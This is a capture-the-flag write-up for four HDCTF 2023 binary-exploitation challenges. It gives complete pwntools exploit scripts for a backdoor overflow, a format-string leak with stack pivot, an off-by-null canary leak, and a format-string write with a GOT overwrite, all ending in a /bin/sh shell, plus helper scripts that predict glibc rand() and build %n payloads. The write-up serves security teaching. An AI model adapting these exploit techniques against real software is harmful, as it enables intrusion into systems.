HDCTF_2023
pwnner
There is a backdoor function, and the seed is a fixed value.
// pseudo-random number: reproduce the value the binary expects
#include <stdio.h>
#include <stdlib.h>
int main()
{
    int b;
    srand(0x39);                       // the fixed seed used by the binary
    for (size_t i = 0; i < 1; i++)     // only the first rand() is needed; raise the bound for more
    {
        b = rand();
        printf("%d ", b);              // prints 1956681178
    }
    return 0;
}
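The same computation in Python, as an added example that is not part of the original write-up: a re-implementation of glibc's srand()/rand() (random_r TYPE_3, degree 31, separation 3, 310 discarded outputs after seeding). It assumes the target links glibc. It also serves Makewish below, which never calls srand: glibc's unseeded state is the srand(1) state, and srand(0) is mapped to seed 1 as well.

```python
# Added example (not from the original write-up): pure-Python glibc rand()
# so the value a binary compares against can be predicted without a compiler.
# Assumption: the target uses glibc's default generator (random_r TYPE_3).

MOD = 0x7fffffff            # 2^31 - 1, modulus of the seeding LCG
MULT = 16807                # Park-Miller multiplier used by srandom_r


def _to_int32(x):
    """Reinterpret an unsigned 32-bit seed as a C int32_t, as srandom_r does."""
    x &= 0xffffffff
    return x - 0x100000000 if x & 0x80000000 else x


def _c_div(a, b):
    """C-style truncating integer division (Python's // floors instead)."""
    q = abs(a) // abs(b)
    return q if (a < 0) == (b < 0) else -q


def glibc_rand_state(seed):
    """Rebuild the 31-word state that srandom_r(seed) produces."""
    word = _to_int32(seed)
    if word == 0:           # glibc: the seed must not be 0, so it becomes 1
        word = 1
    state = [word]
    for _ in range(30):
        # Schrage's method: word = (16807 * word) mod (2^31 - 1) without overflow
        hi = _c_div(word, 127773)
        lo = word - hi * 127773
        word = MULT * lo - 2836 * hi
        if word < 0:
            word += MOD
        state.append(word)
    return state


def glibc_rand(seed, count=1):
    """Return the first `count` values rand() yields after srand(seed)."""
    r = glibc_rand_state(seed)
    # Additive feedback generator r[i] = r[i-31] + r[i-3] (mod 2^32).
    # Indices 31..33 alias the first three words; glibc discards 310 outputs
    # after seeding, so the first visible rand() result is r[344] >> 1.
    r.extend(r[i - 31] for i in range(31, 34))
    out = []
    for i in range(34, 344 + count):
        r.append((r[i - 31] + r[i - 3]) & 0xffffffff)
        if i >= 344:
            out.append(r[i] >> 1)   # result = (uint32_t)state >> 1
    return out


if __name__ == '__main__':
    print(glibc_rand(0x39))                  # compare with the C program above
    print(glibc_rand(0, 3), glibc_rand(1, 3))  # Makewish: no srand() call == seed 1
```

glibc_rand(0x39)[0] should match what the C program prints; for Makewish, glibc_rand(0) gives the sequence of an unseeded process.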
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node1.anna.nssctf.cn', 28067)
p.sendafter(b"name:\n", b'1956681178')        # first rand() after srand(0x39), from the program above
payload = b'a' * 0x48 + p64(0x4008B3)         # pad up to the saved return address, then return into the backdoor
p.sendlineafter(b"next?\n", payload)
p.interactive()
KEEP ON
Attachment: an ordinary stack pivot; the format string vulnerability is used to leak old_rbp.
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node4.anna.nssctf.cn', 28609)
p.sendafter(b": \n", b'%16$p')                # format string: print stack slot 16, which holds the saved rbp
p.recvuntil(b'0x')
rbp = int(p.recv(12), 16)                     # 12 hex digits of a 0x7f... stack address
print(hex(rbp))
payload = b"aaaaaaaa" + p64(0x4008d3) + p64(rbp - 0x60 + 0x20) + p64(0x4005e0) + b'/bin/sh\x00'
payload = payload.ljust(0x50, b'a') + p64(rbp - 0x10 - 0x50) + p64(0x4007f2)   # overwritten saved rbp, then the pivot
p.recvuntil(b"keep on !\n")
p.send(payload)
p.interactive()
Makewish
Attachment: there is no seed function, so the generator is in its default state (in glibc that is the same as seeding with 0, which glibc maps to 1); the random number can be obtained by debugging with gdb or with the pseudo-random number script from the first challenge.
Use puts to leak the canary. The off-by-null vulnerability overwrites the last byte of the saved rbp with \x00, which pivots the stack.
Even if the exploit is correct, it is not guaranteed to go through in a single attempt: the zeroed rbp points at a 0x100-aligned address, and whether that address falls inside the payload depends on where the randomized stack happens to sit.
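The remark that a correct exploit can still fail is easy to quantify. The following is an added example, not code from the write-up, and its frame layout is an assumption chosen to match the shape of the payload used below (a sled of ten ret gadgets in front of the system address): the payload buffer is assumed to start 0x60 bytes below the address stored in the saved rbp, rbp is assumed to be 16-byte aligned (as it is on x86-64 after push rbp), and its low byte is assumed to be uniformly distributed by stack ASLR.

```python
# Added example (not from the original write-up): why an off-by-null pivot is
# probabilistic and how a ret sled raises the odds.
# Assumed layout (not read from the binary): the payload buffer starts
# buf_below_rbp bytes below the value of the saved rbp whose low byte the
# overflow clears; the caller's `leave; ret` pops rbp from that rounded-down
# address and returns to the qword just above it.

QWORD = 8


def pivot_landing(saved_rbp):
    """Address the caller's `ret` reads after `leave` with rbp's low byte zeroed."""
    rounded = saved_rbp & ~0xff      # off-by-null: low byte becomes 0x00
    return rounded + QWORD           # `pop rbp` consumed one qword, `ret` takes the next


def pivot_hits_sled(saved_rbp, buf_below_rbp, sled_qwords):
    """True if the landing address falls on a qword inside the ret sled."""
    buf = saved_rbp - buf_below_rbp
    landing = pivot_landing(saved_rbp)
    inside = buf <= landing < buf + sled_qwords * QWORD
    aligned = (landing - buf) % QWORD == 0   # a straddling read would not hit a gadget
    return inside and aligned


def success_odds(buf_below_rbp, sled_qwords):
    """(hits, total) over every 16-byte-aligned low byte rbp can take.

    rbp is 16-byte aligned on x86-64, so only 16 low-byte values occur; stack
    ASLR makes each roughly equally likely, which is the assumption behind
    reading the ratio as a success probability.
    """
    base = 0x7ffc_0000_1000                      # arbitrary page-aligned stack
    candidates = [base + lb for lb in range(0, 0x100, 16)]
    hits = sum(pivot_hits_sled(rbp, buf_below_rbp, sled_qwords) for rbp in candidates)
    return hits, len(candidates)


if __name__ == '__main__':
    for sled in (1, 5, 10):
        hits, total = success_odds(0x60, sled)
        print(f'sled of {sled:2d} qwords: {hits}/{total} rbp low bytes succeed')
```

With the assumed layout a single gadget slot is never hit, because the zeroed rbp can only land on 16-byte offsets while the slot sits at an odd qword; ten ret gadgets cover five of the sixteen possible low bytes, which is why the exploit is retried rather than expected to work first time.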
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node4.anna.nssctf.cn', 28727)
system = 0x4007Cb
ret = 0x4005d9
p.sendafter(b"name\n\n", b'a' * 0x29)         # 0x28 bytes fill the buffer; the extra byte clobbers the canary's low NUL so puts prints the rest
p.recvuntil(b'a' * 0x29)
canary = u64(p.recv(7).rjust(8, b'\x00'))     # put the low NUL byte back
print(hex(canary))
p.sendafter(b"key\n\n", p32(0x000002c3))      # read only takes four bytes, so sendline (which appends a newline) cannot be used
payload = p64(ret) * 10 + p64(system) + p64(canary)   # ret sled absorbs the pivot's imprecision, then system
p.sendafter(b"welcome to HDctf,You can make a wish to me\n", payload)
p.interactive()
Minions
Attachment: compute the offset and use %d$n (d is the decimal argument index) to write data into key, or use fmtstr_payload(offset, {key: data}).
Pivoting the stack to 0x6010C0 does not work in this challenge, because 0x6010C0 is only 0xC0 bytes above the start of the rw page: anything pushed below it runs into the non-rw segment.
0x600000 0x601000 r--p 1000 # non-rw segment
0x601000 0x602000 rw-p 1000
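How the %102c%8$n payload is put together, and a way to check a format-string write before sending it, as an added example that is not code from the write-up. It assumes what the two solutions below use: the format buffer begins at printf argument 6, key is at 0x6010A0 and must become 102 (0x66). The emulator models only the %Nc and %k$n directives, which is all these payloads need.

```python
import re
import struct

# Added example (not from the original write-up): build the "%Nc%k$n" write the
# Minions solutions use and check it against a tiny printf model first.
# Assumed from the write-up: format buffer at argument 6, key = 0x6010A0, value 102.


def p64(x):
    return struct.pack('<Q', x)


def u64(b):
    return struct.unpack('<Q', b)[0]


def build_fmt_write(offset, addr, value):
    """Payload that makes printf() write `value` (a 4-byte int) to `addr` via %n.

    offset: argument index of the first 8-byte word of our buffer on the stack.
    The address goes after the directives on an 8-byte slot boundary, because
    p64(addr) contains NUL bytes and a NUL terminates the format string.
    """
    if not 1 <= value <= 0x7fffffff:
        raise ValueError('%Nc prints at least one char and %n stores an int')
    for slot in range(offset + 1, offset + 8):
        fmt = b'%%%dc%%%d$n' % (value, slot)
        padded = fmt.ljust(-(-len(fmt) // 8) * 8, b'a')   # round up to a full qword
        if offset + len(padded) // 8 == slot:            # p64(addr) lands in `slot`
            return padded + p64(addr)
    raise ValueError('no consistent slot found')


_DIRECTIVE = re.compile(rb'%(\d+)c|%(\d+)\$n')


def emulate_printf(payload, offset, memory):
    """Minimal printf model for %Nc and %k$n; returns the number of bytes printed.

    The 'stack' is the payload itself split into 8-byte words, the first word
    being argument `offset`, which is the situation when the format string is
    a local buffer of the calling function.
    """
    fmt = payload.split(b'\x00', 1)[0]                    # a NUL ends the format
    words = [payload[i:i + 8].ljust(8, b'\x00') for i in range(0, len(payload), 8)]
    printed = 0
    pos = 0
    while pos < len(fmt):
        m = _DIRECTIVE.match(fmt, pos)
        if m is None:                                     # literal byte
            printed += 1
            pos += 1
            continue
        if m.group(1) is not None:                        # %Nc: width N, at least 1 char
            printed += max(int(m.group(1)), 1)
        else:                                             # %k$n: *arg_k = bytes printed so far
            target = u64(words[int(m.group(2)) - offset])
            memory[target] = printed & 0xffffffff
        pos = m.end()
    return printed


if __name__ == '__main__':
    key = 0x6010A0
    payload = build_fmt_write(6, key, 102)        # starts with b'%102c%8$naaaaaaa'
    mem = {}
    emulate_printf(payload, 6, mem)
    print(payload, hex(mem[key]))                 # 0x66
```

For a value the size of an address, such as the system PLT entry used in method 2, a single %Nc would have to print millions of characters; pwntools' fmtstr_payload avoids that by splitting the write into byte-sized %hhn stores, which is why method 2 uses it rather than this hand-built form.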
I will present two methods to solve this challenge.
Method 1
Go through the loop once and pivot the stack to a higher address.
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node1.anna.nssctf.cn', 28190)
#p = process('./4')
elf = ELF('./4')
def d():
    gdb.attach(p)
    pause()
bss = elf.bss(0xe00)                              # new stack well above 0x6010C0, still inside the rw page
rdi = 0x400893
leave_ret = 0x400758
key = 0x6010A0
again = 0x4007DE
system = 0x4005c0
binsh = 0x6010C8
payload = b'%102c%8$n' + b'a' * 7 + p64(key)     # write 102 to key: 9 bytes of directives + 7 pad put p64(key) in argument slot 8
p.sendlineafter(b"Welcome to HDCTF.What you name?\n\n", payload)
payload = b'a' * 0x30 + p64(bss + 0x30) + p64(again)   # first pass: saved rbp -> bss, return into the loop again
p.sendafter(b"welcome,tell me more about you\n", payload)
p.sendlineafter(b"That's great.Do you like Minions?\n", b'/bin/sh\x00')
payload = p64(rdi) + p64(binsh) + p64(system)     # ROP chain that ends up at the new stack
payload = payload.ljust(0x30, b'\x00') + p64(bss - 8) + p64(leave_ret)   # second pass: pivot rsp to bss and run the chain
p.sendafter(b"welcome,tell me more about you\n", payload)
p.sendlineafter(b"That's great.Do you like Minions?\n", b'/bin/sh\x00' * 5)
p.interactive()
Method 2
Go through the loop twice and overwrite printf's GOT entry with system.
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node1.anna.nssctf.cn', 28627)
elf = ELF('./4')
key = 0x6010A0
main = 0x4007Ae
system = 0x4005c0
payload = b'%102c%8$n' + b'a' * 7 + p64(key)     # write 102 to key
p.sendlineafter(b"Welcome to HDCTF.What you name?\n\n", payload)
payload2 = b'a' * 0x38 + p64(main)                # overwrite the return address with main: run the whole loop again
p.sendafter(b"welcome,tell me more about you\n", payload2)
p.sendafter(b"That's great.Do you like Minions?\n", b'/bin/sh\x00')
payload = fmtstr_payload(6, {elf.got['printf']: system})   # second pass: format string at offset 6 rewrites printf's GOT entry
p.sendafter(b"Welcome to HDCTF.What you name?\n\n", payload)
p.sendafter(b"welcome,tell me more about you\n", payload2)
p.sendafter(b"That's great.Do you like Minions?\n", b'/bin/sh\x00')
p.sendafter(b"Welcome to HDCTF.What you name?\n\n", b'/bin/sh\x00')   # third pass: printf("/bin/sh") is now system("/bin/sh")
p.interactive()